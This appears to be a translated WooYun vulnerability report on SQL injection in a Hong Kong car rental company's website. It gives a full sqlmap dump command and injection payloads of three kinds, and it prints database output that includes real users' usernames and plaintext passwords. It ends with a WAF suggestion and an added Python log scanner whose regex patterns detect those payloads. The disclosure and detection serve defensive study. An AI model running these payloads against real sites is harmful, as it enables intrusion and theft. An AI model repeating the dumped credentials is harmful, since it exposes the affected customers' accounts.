WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2015-11-10: Details reported to the vendor, awaiting vendor response
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and relevant domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
Customer first. "Sincere and attentive, magnificent and distinguished" is the service motto of 皇牌旅運. Since 皇牌旅運有限公司 was founded in 2004, its pragmatic and enterprising approach has, within a few short years, won recognition from the car rental industry and the trust of its customers, and its customer base keeps growing. All staff of this car rental company meet a standard of quality service and professionalism sufficient to resolve any car detailing or car rental issue. To raise the quality of its rental service, the company moved in July 2011 to Tai Yau Street, San Po Kong (新蒲崗大有街), where it continues to provide customers with every rental service and to carry "quality service" into a new era.
Address: http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm
python sqlmap.py -u "http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm" -p cnt --technique=BET --random-agent -D c1v -T member -C id,id_passwd,name,passwd,email,isadmin --dump --start 1 --stop 10
1. 1.54 million user sessions
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1
Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| `session` | 1541977 |
+-----------+---------+
2. User email addresses and passwords
back-end DBMS: MySQL 5.1
Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| member    | 1268    |
+-----------+---------+
Database: c1v
Table: member
[10 entries]
+-----+-----------+----------------------+------------+---------------------------+---------+
| id  | id_passwd | name                 | passwd     | email                     | isadmin |
+-----+-----------+----------------------+------------+---------------------------+---------+
| 1   |           |                      |            | uadmin                    |         |
| 4   |           | adm1                 | adm1       |                           | 1       |
| 13  |           | info@**.**.**.**     | <blank>    | info@**.**.**.**          | 0       |
| 14  |           | biken@**.**.**.**    | <blank>    | biken@**.**.**.**         | 0       |
| 15  |           | unittime@**.**.**.** | <blank>    | unittime@**.**.**.**      | 0       |
| 193 |           | admin                | admin      | admin@**.**.**.**         | 1       |
| 197 |           | annielip1227         | 27121971   | annielip1227@**.**.**.**  | 0       |
| 199 |           | ilvrabbit            | 811529     | aman@**.**.**.**          | 0       |
| 200 |           | CML0700365           | CML0700365 | poohissopoor@**.**.**.**  | 0       |
| 201 |           | cindy625             | 333999     | cindy625@**.**.**.**      | 0       |
+-----+-----------+----------------------+------------+---------------------------+---------+
available databases [1]:
[*] c1v

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cnt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: o=multi&cnt=gethtm' AND 1895=1895 AND 'MieD'='MieD&file=images/20-30/20-30.htm

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: o=multi&cnt=gethtm' AND EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT (ELT(1401=1401,1))),0x7178766b71)) AND 'fJLg'='fJLg&file=images/20-30/20-30.htm

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: o=multi&cnt=gethtm' AND (SELECT * FROM (SELECT(SLEEP(5)))odXj) AND 'CVul'='CVul&file=images/20-30/20-30.htm
---
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.1

Database: c1v
[10 tables]
+----------+
| session  |
| album    |
| article  |
| category |
| currency |
| item     |
| member   |
| post     |
| subject  |
| topic    |
+----------+

Database: c1v
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| `session` | 1541977 |
| item      | 8172    |
| article   | 1445    |
| member    | 1268    |
| category  | 346     |
| subject   | 11      |
| currency  | 4       |
| topic     | 3       |
| post      | 2       |
| album     | 1       |
+-----------+---------+

Database: c1v
Table: member
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| data      | non-numeric |
| email     | non-numeric |
| id        | numeric     |
| id_passwd | numeric     |
| isadmin   | numeric     |
| name      | non-numeric |
| passwd    | non-numeric |
| vid       | numeric     |
+-----------+-------------+
Deploy a WAF.
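Alongside a WAF, a defender would also want to see this probing in the web server's own logs. The following Python is an added example, not part of the original report: it parses constructed nginx combined-format access log lines (client 203.0.113.7 is a documentation address, and the log format is an assumption) and flags requests whose cnt parameter carries the boolean-based, EXTRACTVALUE or SLEEP signatures recorded in the sqlmap output above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three sqlmap techniques recorded in the report:
# boolean-based blind, EXTRACTVALUE error-based and SLEEP time-based.
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s+AND\s+\d+=\d+", re.I),
    "error-based": re.compile(r"EXTRACTVALUE\s*\(", re.I),
    "time-based": re.compile(r"SLEEP\s*\(\s*\d+\s*\)", re.I),
}

# nginx "combined" format (assumed): ip ident user [time] "METHOD uri PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (203.0.113.7 is a documentation address); the three
# injected values are the report's payloads percent-encoded as a client would send them.
LOG_LINES = """\
203.0.113.7 - - [10/Nov/2015:10:00:01 +0800] "GET /lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2015:10:00:02 +0800] "GET /lang_trad/?o=multi&cnt=gethtm%27%20AND%201895%3D1895%20AND%20%27MieD%27%3D%27MieD&file=images/20-30/20-30.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2015:10:00:03 +0800] "GET /lang_trad/?o=multi&cnt=gethtm%27%20AND%20EXTRACTVALUE(1401,CONCAT(0x5c,0x717a6b6271,(SELECT%20(ELT(1401%3D1401,1))),0x7178766b71))%20AND%20%27fJLg%27%3D%27fJLg&file=images/20-30/20-30.htm HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2015:10:00:09 +0800] "GET /lang_trad/?o=multi&cnt=gethtm%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))odXj)%20AND%20%27CVul%27%3D%27CVul&file=images/20-30/20-30.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def classify_request(uri, param="cnt"):
    """Return the technique names whose signature appears in the decoded `param` value(s)."""
    values = parse_qs(urlsplit(uri).query, keep_blank_values=True).get(param, [])
    hits = []
    for value in values:  # parse_qs has already percent-decoded the value
        for name, pattern in SIGNATURES.items():
            if name not in hits and pattern.search(value):
                hits.append(name)
    return hits

def scan_log(text):
    """Parse combined-format lines and report the ones carrying an injection signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        techniques = classify_request(m.group("uri"))
        if techniques:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), "techniques": techniques})
    return findings

if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f"{f['time']} {f['ip']} HTTP {f['status']}: {', '.join(f['techniques'])}")
```

The benign first request produces no finding; a 500 response on the EXTRACTVALUE request is the error-based technique surfacing in the status column as well as in the query string.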
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-11-20 15:09
Referred to related parties.
None for now.